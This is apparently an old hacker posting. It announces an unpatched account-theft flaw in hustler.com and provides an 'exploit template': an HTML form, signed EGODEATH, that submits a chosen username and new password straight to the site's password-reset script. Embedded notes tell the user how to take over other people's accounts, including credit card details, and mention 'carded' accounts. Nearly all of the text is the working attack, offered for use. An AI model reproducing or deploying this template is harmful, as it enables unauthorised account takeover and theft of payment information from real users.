`security vulnerability in hustler.com which allows any user to
steal another users account and gain access to full access to
their account including cc# information
no fix yet. hustler.com has been informed.
----------------------------------------------------------------------------
exploit template
----------------------------------------------------------------------------
<!-- E G 0 D 3 A T H -->
<HTML>
<HEAD><TITLE>HUSTLER LOGIN THEIF BY EGODEATH</TITLE></HEAD>
<BODY bgcolor=#000000 text=#FFFFFF>
<table border="0">
<th><font colo<b><u>HACKED</b></u>
</table>
<H2>Change My Password - ego's M0D1Fi3D verzi0n</H2>
<FORM METHOD="POST" ACTION="https://members.flyntdigital.com/secure-bin/usr_search_admin/resetpass.pl">
<TABLE BORDER=1 CELLSPACING=0 CELLPADDING=4 WIDTH=500>
<TR>
<TH VALIGN=TOP WIDTH=40% ALIGN=RIGHT>Highlight the User ID: </TH>
<TD>
<font color=red>This is the hustler account thief script<br>in order for this to work you must know<br>somones real login name ( if its an old carded<br> account with a nick like XTC, give up<br> you cant steal a froozen account, but<br> yea.. u can change its password...</font>
<input type="text" NAME="usr_login" value="a real login name">
</TD>
</TR>
<TR>
<TD align=left>Enter Your New Password</TD>
<TD align=right>Enter Password again</TD>
</TR>
<TR>
<TD ALIGN=left>
<INPUT TYPE="text" NAME="pass_wd1" VALUE="">
</TD>
<TD align=right>
<INPUT TYPE="text" NAME="pass_wd2" VALUE="">
</TD>
</TR>
<TR>
<TD COLSPAN=2 ALIGN=CENTER>
<INPUT TYPE="submit" NAME="submit" VALUE="Submit">
<INPUT TYPE="reset" NAME="reset" VALUE="Reset">
</TD>
</TR>
</TABLE>
</FORM>
</BODY>
</HTML>
`